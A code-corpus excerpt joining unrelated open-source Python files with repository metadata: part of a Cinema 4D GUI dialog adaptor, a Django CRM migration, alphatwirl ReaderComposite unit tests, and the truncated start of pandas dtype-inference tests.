self.SetString(elem["id"],elem["value"])
def drawString(self,elem,x,y,w=None,h=None):
""" Draw a String input elem
@type elem: dictionary
@param elem: the string input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
self.AddEditText(id=elem["id"],
flags=elem["alignement"],#| c4d.BFV_MASK,#BFH_CENTER
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
self.SetString(elem["id"],elem["value"])
def drawSliders(self,elem,x,y,w=None,h=None):
""" Draw a Slider elem, the variable/value of the elem define the slider format
@type elem: dictionary
@param elem: the slider input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
self.AddEditSlider(id=elem["id"],
flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
if elem["variable"] is None :
elem["variable"] =0.0
if elem["maxi"] is None :
elem["maxi"] =0.0
if elem["mini"] is None :
elem["mini"] =0.0
if elem["step"] is None :
elem["step"] =0.0
self.SetReal(elem["id"],float(elem["variable"]),float(elem["mini"]),
float(elem["maxi"]), float(elem["step"]))
def drawNumbers(self,elem,x,y,w=None,h=None):
""" Draw a Int input elem
@type elem: dictionary
@param elem: the Int input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
if elem["value"] is None :
elem["value"] = elem["variable"]
self.AddEditNumberArrows(id=elem["id"],
flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
self.SetLong(elem["id"],int(elem["value"]),int(elem["mini"]),
int(elem["maxi"]))
def drawFloat(self,elem,x,y,w=None,h=None):
""" Draw a float input elem
@type elem: dictionary
@param elem: the Int input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
if elem["value"] is None :
elem["value"] = elem["variable"]
if elem["value"] is None :
elem["value"] =0.0
if elem["maxi"] is None :
elem["maxi"] =0.0
if elem["mini"] is None :
elem["mini"] =0.0
self.AddEditNumberArrows(id=elem["id"],
flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
#print float(elem["value"]),float(elem["mini"]),float(elem["maxi"])
self.SetReal(elem["id"],float(elem["value"]),float(elem["mini"]),
float(elem["maxi"]))
def drawImage(self,elem,x,y,w=None,h=None):
""" Draw an Image, if the host supported it
@type elem: dictionary
@param elem: the image input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
pass
# bmp = c4d.bitmaps.BaseBitmap()
# bmp.InitWith(elem["value"])
# bc = c4d.BaseContainer()
# need to use userarea
# area = c4d.gui.GeUserArea()
# self.AddUserArea(5000,flags=c4d.BFH_SCALEFIT,initw=100, inith=150)
# self.AttachUserArea(area, id=10, userareaflags=c4d.USERAREA_COREMESSAGE)
# self.area.DrawBitmap(bmp, 0, 0, 396, 60, 0, 0, 396, 60, mode=c4d.BMP_NORMALSCALED)#396x60
## self.area.DrawText('welcome to ePMV '+__version__, 0, 0, flags=c4d.DRAWTEXT_STD_ALIGN)
# self.area.Init()
# self.area.InitValues()
def drawColorField(self,elem,x,y,w=None,h=None):
""" Draw a Color entry Field
@type elem: dictionary
@param elem: the color input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = elem["alignement"]
# print elem
self.AddColorField(id=elem["id"],flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
if elem["value"]is not None:
# print "v",elem["value"]
self.setColor(elem,elem["value"])
# print "n",elem["name"]
def drawError(self,errormsg=""):
""" Draw a error message dialog
@type errormsg: string
@param errormsg: the messag to display
"""
c4d.gui.MessageDialog("ERROR: "+errormsg)
def drawQuestion(self,title="",question="",callback=None):
""" Draw a Question message dialog, requiring a Yes/No answer
@type title: string
@param title: the windows title
@type question: string
@param question: the question to display
@rtype: bool
@return: the answer
"""
res = c4d.gui.QuestionDialog(question)
if callback is not None :
callback(res)
else :
return res
def drawMessage(self,title="",message=""):
""" Draw a message dialog
@type title: string
@param title: the windows title
@type message: string
@param message: the message to display
"""
c4d.gui.MessageDialog(message)
def drawInputQuestion(self,title="",question="",callback=None):
""" Draw an Input Question message dialog, requiring a string answer
@type title: string
@param title: the windows title
@type question: string
@param question: the question to display
@rtype: string
@return: the answer
"""
result = c4d.gui.InputDialog(question,"")
if result :
if callback is not None :
callback(result)
else :
return result
def drawFrame(self,bloc,x,y):
"""
Function to draw a block as a collapsable frame layout of the gui.
@type block: array or dictionary
@param block: list or dictionary of item dictionary
@type x: int
@param x: position on x in the gui windows, used for blender
@type y: int
@param y: position on y in the gui windows, used for blender
@rtype: int
@return: the new horizontal position, used for blender
"""
grFlag = c4d.BFH_SCALEFIT# |c4d.BFV_MASK
if bloc["scrolling"]:
self.ScrollGroupBegin(id=50000, flags= c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT,
scrollflags= c4d.SCROLLGROUP_NOSCROLLER|c4d.SCROLLGROUP_NOBLIT)#c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT)
# inith=100,initw=1000)
grFlag = c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT
else :
self.ScrollGroupBegin(id=50000, flags= c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT,
scrollflags= c4d.SCROLLGROUP_NOSCROLLER|c4d.SCROLLGROUP_NOBLIT)#c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT)
# inith=100,initw=1000)
if bloc["collapse"] :
collapse = c4d.BFV_BORDERGROUP_FOLD#|c4d.BFV_GRIDGROUP_EQUALCOLS
else :
collapse = c4d.BFV_BORDERGROUP_FOLD|c4d.BFV_BORDERGROUP_FOLD_OPEN
self.GroupBegin(id=bloc["id"],title=bloc["name"],cols=1,#rows=len(bloc["elems"]),
flags= c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT,
groupflags=collapse)
self.GroupBorder(c4d.BORDER_ROUND|c4d.BORDER_THIN_IN|c4d.BORDER_WITH_TITLE|c4d.BORDER_MASK)#|c4d.BORDER_MASK
# self.GroupBorderSpace(self.left, self.top, self.right, self.bottom)
for k,blck in enumerate(bloc["elems"]):
self.startBlock(m=len(blck))
for index, item in enumerate(blck):
self._drawElem(item,x,y)
self.endBlock()
self.endBlock()
self.endBlock()
#if bloc["scrolling"]:
# self.endBlock()#scroll
# self.endBlock()#main
return y
def drawTab(self,bloc,x,y):
"""
Function to draw a block as a collapsable frame layout of the gui.
@type block: array or dictionary
@param block: list or dictionary of item dictionary
@type x: int
@param x: position on x in the gui windows, used for blender
@type y: int
@param y: position on y in the gui windows, used for blender
@rtype: int
@return: the new horizontal position, used for blender
"""
#TODO the Group system is confusin and nee to be improved inuPy
#can we change color?
if not self.tab :
self.notebook = self.TabGroupBegin(id=bloc["id"]*1000,#title=bloc["name"],cols=1,
flags=c4d.BFH_SCALEFIT | c4d.BFV_SCALEFIT,
tabtype=c4d.TAB_TABS)
self.GroupBorder(c4d.BORDER_THIN_IN|c4d.BORDER_MASK)#c4d.BORDER_BLACK|BORDER_WITH_TITLE
self.tab = True
# self.GroupBorderSpace(self.left, self.top, self.right, self.bottom)
grFlag = c4d.BFH_SCALEFIT |c4d.BFV_MASK
self.GroupBegin(id=bloc["id"],title=bloc["name"],cols=1,#initw=self.w,inith=self.h,
flags=grFlag)#c4d.BFH_SCALEFIT|c4d.BFV_SCALEFIT)#BFH_CENTER)
if bloc["scrolling"]:
self.ScrollGroupBegin(id=bloc["id"]*5, flags=c4d.BFH_SCALEFIT|c4d.BFV_SCALEFIT,
scrollflags=c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT)
# inith=100,initw=1000)
grFlag = c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT
# self.GroupBorderNoTitle(c4d.BORDER_NONE|c4d.BORDER_WITH_TITLE)
#should use max number of column?
#get max nb elem:
max = 0
for k,blck in enumerate(bloc["elems"]):
if len(blck) > max :
maxi = len(blck)
self.GroupBegin(id=bloc["id"],title=bloc["name"],cols=1,#initw=self.w,inith=self.h,
flags=grFlag)#c4d.BFH_SCALEFIT|c4d.BFV_SCALEFIT)#BFH_CENTER)
# if bloc["scrolling"]:
# self.GroupBorder(c4d.BORDER_THIN_IN|c4d.BORDER_WITH_TITLE|c4d.BORDER_WITH_TITLE_BOLD| c4d.BORDER_MASK)
# else :
# self.GroupBorderNoTitle(c4d.BORDER_THIN_IN|c4d.BORDER_MASK)
# if self.scrolling:
# self.ScrollGroupBegin(id=bloc["id"]*5000, flags=c4d.BFH_CENTER | c4d.BFV_MASK,#initw=self.w,inith=self.h,
# scrollflags=c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT|c4d.SCROLLGROUP_BORDERIN|c4d.SCROLLGROUP_STATUSBAR | c4d.SCROLLGROUP_NOBLIT)
# BFV_SCALEFIT | BFH_SCALEFIT,
# SCROLLGROUP_STATUSBAR | SCROLLGROUP_BORDERIN |
# SCROLLGROUP_NOBLIT
for k,blck in enumerate(bloc["elems"]):
if type(blck) is list :
self.GroupBegin(id=int(k*25),cols=len(blck),title=str(k),
flags=c4d.BFH_SCALEFIT)#c4d.BFH_CENTER)
for index, item in enumerate(blck):
self._drawElem(item,x,y)
self.endBlock()
else : #dictionary: multiple line / format dict?
if "0" in blck:
y = self._drawGroup(blck,x,y)
else :
blck["scrolling"] = False
y = self._drawFrame(blck,x,y)
# if self.scrolling:
# self.endBlock()
if bloc["scrolling"]:
self.endBlock()
self.endBlock()
self.endBlock()
# self.LayoutChanged(bloc["id"])
return y
def saveDialog(self,label="",callback=None, suffix=""):
""" Draw a File input dialog
@type label: string
@param label: the windows title
@type callback: function
@param callback: the callback function to call
"""
filename = c4d.storage.SaveDialog(c4d.FSTYPE_ANYTHING,label)
if callback is not None:
return callback(filename)
else :
return filename
def fileDialog(self,label="",callback=None, suffix=""):
""" Draw a File input dialog
@type label: string
@param label: the windows title
@type callback: function
@param callback: the callback function to call
"""
filename = c4d.storage.LoadDialog(c4d.FSTYPE_ANYTHING,label)
if callback is not None:
return callback(filename)
else :
return filename
def waitingCursor(self,toggle):
""" Toggle the mouse cursor appearance from the busy to idle.
@type toggle: Bool
@param toggle: Weither the cursor is busy or idle
"""
if not toggle :
c4d.gui.SetMousePointer(c4d.MOUSE_NORMAL)
else :
c4d.gui.SetMousePointer(c4d.MOUSE_BUSY)
def updateViewer(self):
"""
update the 3d windows if any
"""
c4d.EventAdd()
c4d.DrawViews(c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW|c4d.DRAWFLAGS_NO_THREAD|c4d.DRAWFLAGS_NO_ANIMATION)
c4d.GeSyncMessage(c4d.EVMSG_TIMECHANGED)
def startBlock(self,m=1,n=1):
if m == 0:
m = 1
self.GroupBegin(id=1,flags=c4d.BFH_SCALEFIT | c4d.BFV_MASK,
cols=m, rows=n)
self.GroupBorderSpace(self.left, self.top, self.right, self.bottom)
# self.bid+=1
def endBlock(self):
self.GroupEnd()
#self.GroupEnd()
def startLayout(self):
grFlag = c4d.BFH_SCALEFIT |c4d.BFV_MASK
grFlag = c4d.BFH_SCALEFIT| c4d.BFV_SCALEFIT | c4d.BFV_GRIDGROUP_EQUALROWS
if self.scrolling:
self.ScrollGroupBegin(id=2, flags=grFlag,
scrollflags=c4d.SCROLLGROUP_VERT)
#grFlag = c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT
self.GroupBegin(id=1,flags=grFlag ,cols=1)#initw ?
#self.GroupBorder(c4d.BORDER_ROUND|c4d.BORDER_THIN_IN)
def endLayout(self):
self.GroupEnd()
if self.scrolling:
self.GroupEnd()
## SCROLLGROUP_VERT Allow the group to scroll vertically.
## SCROLLGROUP_HORIZ Allow the group to scroll horizontally.
## SCROLLGROUP_NOBLIT Always redraw the whole group, not just new areas, when scrolling.
## SCROLLGROUP_LEFT Create the vertical slider to the left.
## SCROLLGROUP_BORDERIN Display a small border around the scroll group.
## SCROLLGROUP_STATUSBAR Create a status bar for the scroll group.
## SCROLLGROUP_AUTOHORIZ Only show horizontal slider if needed.
## SCROLLGROUP_AUTOVERT Only show vertical slider if needed.
## SCROLLGROUP_NOSCROLLER No scroller.
## SCROLLGROUP_NOVGAP No vertical gap.
## SCROLLGROUP_STATUSBAR_EXT_GROUP Creates an extern group within the statusbar.
# if self.scrolling:
# self.ScrollGroupBegin(id=50000, flags=c4d.BFH_SCALEFIT | c4d.BFV_SCALEFIT,
# scrollflags=c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT)
# self.GroupBorderSpace(self.left, self.top, self.right, self.bottom)
##
# if self.tab:
# self.GroupEnd()#self.Activate(1)#GroupEnd()
#
def getString(self,elem):
""" Return the current string value of the String Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: string
@return: the current string input value for this specific elem
"""
return self.GetString(elem["id"])
def setString(self,elem,val):
""" Set the current String value of the string input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: string
@param val: the new string value
"""
self.SetString(elem["id"],val)
def getStringArea(self,elem):
""" Return the current string area value of the String area Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: string
@return: the current string area input value for this specific elem
"""
return self.GetString(elem["id"])
def setStringArea(self,elem,val):
""" Set the current String area value of the string input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: string
@param val: the new string value (multiline)
"""
self.SetString(elem["id"],val)
def getReal(self,elem):
""" Return the current Float value of the Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: Float
@return: the current Float value input for this specific elem
"""
val = self.GetReal(elem["id"])
#check if its a real actually
if isinstance(val, float):
return val
def setReal(self,elem,val):
""" Set the current Float value of the Float input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: Float
@param val: the new Float value
"""
print elem,val
print type(val)
return self.SetReal(elem["id"],float(val))
def getBool(self,elem):
""" Return the current Bool value of the Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: Bool
@return: the current Bool value input for this specific elem
"""
return self.GetBool(elem["id"])
def setBool(self,elem,val):
""" Set the current Bool value of the Bool input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: Bool
@param val: the new Bool value
"""
return self.SetBool(elem["id"],bool(val))
def getLong(self,elem):
""" Return the current Int value of the Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: Int
@return: the current Int value input for this specific elem
"""
val = self.GetLong(elem["id"])
if isinstance(val, int):
return val
def setLong(self,elem,val):
""" Set the current Int value of the Int input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: Int
@param val: the new Int value
"""
return self.SetLong(elem["id"],int(val))
def getColor(self,elem):
""" Return the current Color value of the Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: Color
@return: the current Color array RGB value input for this specific elem
"""
c4dcol = self.GetColorField(elem["id"])['color']
return [c4dcol.x,c4dcol.y,c4dcol.z]
def setColor(self,elem,val):
""" Set the current Color rgb arrray value of the Color input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: Color
@param val: the new Color value
"""
# print "in setColor",elem
c4dcol = self.GetColorField(elem["id"])
# print elem["id"]
c4dcol['color'].x=val[0]
c4dcol['color'].y=val[1]
c4dcol['color'].z=val[2]
self.SetColorField(elem["id"],c4dcol['color'],1.0,1.0,0)
def setAction(self,elem,callback):
elem["action"] = callback
def updateSlider(self,elem,mini,maxi,default,step):
""" Update the state of the given slider, ie format, min, maxi, step
@type elem: dictionary
@param elem: the slider elem dictionary
@type maxi: int/float
@param maxi: max value for the item, ie slider
@type mini: int/float
@param mini: min value for the item, ie slider
@type default: int/float
@param default: default value for the item, ie slider
@type step: int/float
@param step: step value for the item, ie slider
"""
if type(step) is int:
doit = self.SetLong
else :
doit = self.SetReal
doit(elem["id"],default,mini,maxi,step)
@classmethod
def _restore(self,rkey,dkey=None):
"""
Function used to restore the windows data, usefull for plugin
@type rkey: string
@param rkey: the key to access the data in the registry/storage
@type dkey: string
@param dkey: wiether we want a particular data from the stored dic
"""
if hasattr(c4d,rkey):
obj = c4d.__dict__[rkey]
if dkey is not None:
if c4d.__dict__[rkey].has_key(dkey) :
return c4d.__dict__[rkey][dkey]
else :
return None
return obj
else :
return None
@classmethod
def _store(self,rkey,dict):
"""
Function used to store the windows data, usefull for plugin
@type rkey: string
@param rkey: the key to access the data in the registry/storage
@type dict: dictionary
@param dict: the storage is done throught a dictionary
"""
c4d.__dict__[rkey]= dict
def drawSubDialog(self,dial,id,callback = None,asynchro = True):
"""
Draw the given subdialog whit his own element and callback
@type dial: dialog Object
@param dial: the dialog object to be draw
@type id: int
@param id: the id of the dialog
@type callback: function
@param callback: the associate callback
"""
print (dial,id,asynchro)
if asynchro :
dial.Open(c4d.DLG_TYPE_ASYNC, pluginid=id, defaultw=dial.w, defaulth=dial.h)
else :
dial.Open(c4d.DLG_TYPE_MODAL, pluginid=id, defaultw=dial.w, defaulth=dial.h)
def close(self,*args):
""" Close the windows"""
self.Close()
def display(self):
""" Create and Open the current gui windows """
#how to display it/initialize it ?
self.Open(c4d.DLG_TYPE_ASYNC, pluginid=self.plugid,
defaultw=self.w, defaulth=self.h)
def getDirectory(self):
"""return software directory for script and preferences"""
prefpath=c4d.storage.GeGetC4DPath(1)
os.chdir(prefpath)
os.chdir(".."+os.sep)
self.prefdir = os.path.abspath(os.curdir)
if sys.platform == "darwin" :
self.softdir = c4d.storage.GeGetC4DPath(4)
elif sys.platform == "win32":
self.softdir = c4d.storage.GeGetC4DPath(2)
class c4dUIDialog(c4dUI,uiAdaptor):
def __init__(self,**kw):
if kw.has_key("title"):
self.title= kw["title"]
self._setTitle(self.title)
#class c4dUISubDialog(c4dUI,uiAdaptor):
# def __init__(self,):
# c4dUIDialog.__init__(self,)
#
###############WIDGET####################################
import time
class TimerDialog(c4d.gui.SubDialog):
"""
Timer dialog for c4d, wait time for user input.
from Pmv.hostappInterface.cinema4d_dev import helperC4D as helper
dial = helper.TimerDialog()
dial.cutoff = 30.0
dial.Open(c4d.DLG_TYPE_ASYNC, pluginid=3555550, defaultw=250, defaulth=100)
"""
def init(self):
self.startingTime = time.time()
self.dT = 0.0
self._cancel = False
self.SetTimer(100) #miliseconds
#self.cutoff = ctime #seconds
#self.T = int(ctime)
def initWidgetId(self):
id = 1000
self.BTN = {"No":{"id":id,"name":"No",'width':50,"height":10,
"action":self.continueFill},
"Yes":{"id":id+1,"name":"Yes",'width':50,"height":10,
"action":self.stopFill},
}
id += len(self.BTN)
self.LABEL_ID = [{"id":id,"label":"Did you want to Cancel the Job:"},
{"id":id+1,"label":str(self.cutoff) } ]
id += len(self.LABEL_ID)
return True
def CreateLayout(self):
ID = 1
self.SetTitle("Cancel?")
self.initWidgetId()
#minimize otin/button
self.GroupBegin(id=ID,flags=c4d.BFH_SCALEFIT | c4d.BFV_MASK,
cols=2, rows=10)
self.GroupBorderSpace(10, 10, 5, 10)
ID +=1
self.AddStaticText(self.LABEL_ID[0]["id"],flags=c4d.BFH_LEFT)
self.SetString(self.LABEL_ID[0]["id"],self.LABEL_ID[0]["label"])
self.AddStaticText(self.LABEL_ID[1]["id"],flags=c4d.BFH_LEFT)
self.SetString(self.LABEL_ID[1]["id"],self.LABEL_ID[1]["label"])
ID +=1
for key in self.BTN.keys():
self.AddButton(id=self.BTN[key]["id"], flags=c4d.BFH_LEFT | c4d.BFV_MASK,
initw=self.BTN[key]["width"],
inith=self.BTN[key]["height"],
name=self.BTN[key]["name"])
self.init()
return True
def open(self):
self.Open(c4d.DLG_TYPE_MODAL, pluginid=25555589, defaultw=120, defaulth=100)
def Timer(self,val):
#print val val seem to be the gadget itself ?
#use to se if the user answer or not...like of nothing after x ms
#close the dialog
# self.T -= 1.0
curent_time = time.time()
self.dT = curent_time - self.startingTime
# print self.dT, self.T
self.SetString(self.LABEL_ID[1]["id"],str(self.cutoff-self.dT ))
if self.dT > self.cutoff :
self.continueFill()
def stopFill(self):
self._cancel = True
self.Close()
def continueFill(self):
self._cancel = False
self.Close()
def Command(self, id, msg):
for butn in self.BTN.keys():
if id == self.BTN[butn]["id"]:
self.BTN[butn]["action"]()
return True
| gpl-3.0 | 645,004,486,327,748,500 | 37.44592 | 142 | 0.540422 | false |
tdfischer/organizer | crm/migrations/0001_initial.py | 1 | 1152 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2018-07-27 07:36
from __future__ import unicode_literals
import address.models
from django.db import migrations, models
import django.db.models.deletion
import taggit.managers
class Migration(migrations.Migration):
initial = True
dependencies = [
('address', '0001_initial'),
('taggit', '0002_auto_20150616_2121'),
]
operations = [
migrations.CreateModel(
name='Person',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('email', models.CharField(max_length=200)),
('created', models.DateTimeField(auto_now_add=True)),
('address', address.models.AddressField(blank=True, on_delete=django.db.models.deletion.CASCADE, to='address.Address')),
('tags', taggit.managers.TaggableManager(help_text='A comma-separated list of tags.', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='Tags')),
],
),
]
| agpl-3.0 | 8,889,659,258,526,600,000 | 35 | 170 | 0.615451 | false |
alphatwirl/alphatwirl | tests/unit/loop/test_ReaderComposite.py | 1 | 5569 | # Tai Sakuma <[email protected]>
import copy
import logging
import pytest
import unittest.mock as mock
from alphatwirl.loop import ReaderComposite
##__________________________________________________________________||
@pytest.fixture()
def obj():
return ReaderComposite()
def test_repr(obj):
repr(obj)
def test_init_with_readers():
reader1 = mock.Mock()
reader2 = mock.Mock()
readers = [reader1, reader2]
obj = ReaderComposite(readers=readers)
assert readers is not obj.readers
assert readers == obj.readers
def test_event_two_readers_two_events(obj):
"""
composite
|- reader1
|- reader2
"""
reader1 = mock.Mock()
reader2 = mock.Mock()
obj.add(reader1)
obj.add(reader2)
events = mock.Mock()
obj.begin(events)
assert [mock.call(events)] == reader1.begin.call_args_list
assert [mock.call(events)] == reader2.begin.call_args_list
event1 = mock.Mock()
obj.event(event1)
event2 = mock.Mock()
obj.event(event2)
assert [mock.call(event1), mock.call(event2)], reader1.events.call_args_list
assert [mock.call(event1), mock.call(event2)], reader2.events.call_args_list
obj.end()
assert [mock.call()] == reader1.end.call_args_list
assert [mock.call()] == reader2.end.call_args_list
def test_event_nested_composite():
"""
composite1
|- composite2
| |- reader1
| |- reader2
|- reader3
"""
obj1 = ReaderComposite()
obj2 = ReaderComposite()
reader1 = mock.Mock()
reader2 = mock.Mock()
reader3 = mock.Mock()
obj1.add(obj2)
obj2.add(reader1)
obj2.add(reader2)
obj1.add(reader3)
events = mock.Mock()
obj1.begin(events)
assert [mock.call(events)] == reader1.begin.call_args_list
assert [mock.call(events)] == reader2.begin.call_args_list
assert [mock.call(events)] == reader3.begin.call_args_list
event1 = mock.Mock()
obj1.event(event1)
event2 = mock.Mock()
obj1.event(event2)
assert [mock.call(event1), mock.call(event2)], reader1.events.call_args_list
assert [mock.call(event1), mock.call(event2)], reader2.events.call_args_list
assert [mock.call(event1), mock.call(event2)], reader3.events.call_args_list
obj1.end()
assert [mock.call()] == reader1.end.call_args_list
assert [mock.call()] == reader2.end.call_args_list
assert [mock.call()] == reader3.end.call_args_list
def test_return_False(obj):
"""
composite
|- reader1 (return None)
|- reader2 (return True)
|- reader3 (return False)
|- reader4
"""
reader1 = mock.Mock()
reader2 = mock.Mock()
reader3 = mock.Mock()
reader4 = mock.Mock()
obj.add(reader1)
obj.add(reader2)
obj.add(reader3)
obj.add(reader4)
events = mock.Mock()
obj.begin(events)
reader1.event.return_value = None
reader2.event.return_value = True
reader3.event.return_value = False
event1 = mock.Mock()
ret = obj.event(event1)
assert [mock.call(event1)], reader1.event.call_args_list
assert [mock.call(event1)], reader2.event.call_args_list
assert [mock.call(event1)], reader3.event.call_args_list
assert [mock.call()], reader4.event.call_args_list
assert ret is None
obj.end()
def test_no_begin_end(obj):
"""
composite
|- reader1
|- reader2 (without begin end)
|- reader3
"""
reader1 = mock.Mock()
reader2 = mock.Mock()
del reader2.begin
del reader2.end
reader3 = mock.Mock()
obj.add(reader1)
obj.add(reader2)
obj.add(reader3)
events = mock.Mock()
obj.begin(events)
assert [mock.call(events)] == reader1.begin.call_args_list
assert [mock.call(events)] == reader3.begin.call_args_list
event1 = mock.Mock()
obj.event(event1)
event2 = mock.Mock()
obj.event(event2)
assert [mock.call(event1), mock.call(event2)], reader1.events.call_args_list
assert [mock.call(event1), mock.call(event2)], reader2.events.call_args_list
assert [mock.call(event1), mock.call(event2)], reader3.events.call_args_list
obj.end()
assert [mock.call()] == reader1.end.call_args_list
assert [mock.call()] == reader3.end.call_args_list
##__________________________________________________________________||
def test_merge(obj):
"""
composite
|- reader1
|- reader2 (no merge)
|- reader3
"""
reader1 = mock.Mock()
reader2 = mock.Mock()
reader3 = mock.Mock()
del reader2.merge
obj.add(reader1)
obj.add(reader2)
obj.add(reader3)
obj1 = copy.deepcopy(obj)
assert obj.readers[0] is reader1
assert obj.readers[1] is reader2
assert obj.readers[2] is reader3
assert obj1.readers[0] is not reader1
assert obj1.readers[1] is not reader2
assert obj1.readers[2] is not reader3
obj.merge(obj1)
assert [mock.call(obj1.readers[0])] == reader1.merge.call_args_list
assert [mock.call(obj1.readers[2])] == reader3.merge.call_args_list
##__________________________________________________________________||
def test_collect(obj):
"""
composite
|- reader1
|- reader2 (no collect)
|- reader3
"""
reader1 = mock.Mock()
reader2 = mock.Mock()
reader3 = mock.Mock()
del reader2.collect
obj.add(reader1)
obj.add(reader2)
obj.add(reader3)
assert [reader1.collect(), None, reader3.collect()] == obj.collect()
##__________________________________________________________________||
| bsd-3-clause | -7,181,992,113,681,262,000 | 25.268868 | 80 | 0.597773 | false |
datapythonista/pandas | pandas/tests/dtypes/cast/test_infer_dtype.py | 4 | 6174 | from datetime import (
date,
datetime,
timedelta,
)
import numpy as np
import pytest
from pandas.core.dtypes.cast import (
infer_dtype_from,
infer_dtype_from_array,
infer_dtype_from_scalar,
)
from pandas.core.dtypes.common import is_dtype_equal
from pandas import (
Categorical,
Interval,
Period,
Series,
Timedelta,
Timestamp,
date_range,
)
@pytest.fixture(params=[True, False])
def pandas_dtype(request):
return request.param
def test_infer_dtype_from_int_scalar(any_int_dtype):
# Test that infer_dtype_from_scalar is
# returning correct dtype for int and float.
data = np.dtype(any_int_dtype).type(12)
dtype, val = infer_dtype_from_scalar(data)
assert dtype == type(data)
def test_infer_dtype_from_float_scalar(float_dtype):
float_dtype = np.dtype(float_dtype).type
data = float_dtype(12)
dtype, val = infer_dtype_from_scalar(data)
assert dtype == float_dtype
@pytest.mark.parametrize(
"data,exp_dtype", [(12, np.int64), (np.float_(12), np.float64)]
)
def test_infer_dtype_from_python_scalar(data, exp_dtype):
dtype, val = infer_dtype_from_scalar(data)
assert dtype == exp_dtype
@pytest.mark.parametrize("bool_val", [True, False])
def test_infer_dtype_from_boolean(bool_val):
dtype, val = infer_dtype_from_scalar(bool_val)
assert dtype == np.bool_
def test_infer_dtype_from_complex(complex_dtype):
data = np.dtype(complex_dtype).type(1)
dtype, val = infer_dtype_from_scalar(data)
assert dtype == np.complex_
@pytest.mark.parametrize(
"data", [np.datetime64(1, "ns"), Timestamp(1), datetime(2000, 1, 1, 0, 0)]
)
def test_infer_dtype_from_datetime(data):
dtype, val = infer_dtype_from_scalar(data)
assert dtype == "M8[ns]"
@pytest.mark.parametrize("data", [np.timedelta64(1, "ns"), Timedelta(1), timedelta(1)])
def test_infer_dtype_from_timedelta(data):
dtype, val = infer_dtype_from_scalar(data)
assert dtype == "m8[ns]"
@pytest.mark.parametrize("freq", ["M", "D"])
def test_infer_dtype_from_period(freq, pandas_dtype):
p = Period("2011-01-01", freq=freq)
dtype, val = infer_dtype_from_scalar(p, pandas_dtype=pandas_dtype)
if pandas_dtype:
exp_dtype = f"period[{freq}]"
else:
exp_dtype = np.object_
assert dtype == exp_dtype
assert val == p
@pytest.mark.parametrize(
"data", [date(2000, 1, 1), "foo", Timestamp(1, tz="US/Eastern")]
)
def test_infer_dtype_misc(data):
dtype, val = infer_dtype_from_scalar(data)
assert dtype == np.object_
@pytest.mark.parametrize("tz", ["UTC", "US/Eastern", "Asia/Tokyo"])
def test_infer_from_scalar_tz(tz, pandas_dtype):
dt = Timestamp(1, tz=tz)
dtype, val = infer_dtype_from_scalar(dt, pandas_dtype=pandas_dtype)
if pandas_dtype:
exp_dtype = f"datetime64[ns, {tz}]"
else:
exp_dtype = np.object_
assert dtype == exp_dtype
assert val == dt
@pytest.mark.parametrize(
"left, right, subtype",
[
(0, 1, "int64"),
(0.0, 1.0, "float64"),
(Timestamp(0), Timestamp(1), "datetime64[ns]"),
(Timestamp(0, tz="UTC"), Timestamp(1, tz="UTC"), "datetime64[ns, UTC]"),
(Timedelta(0), Timedelta(1), "timedelta64[ns]"),
],
)
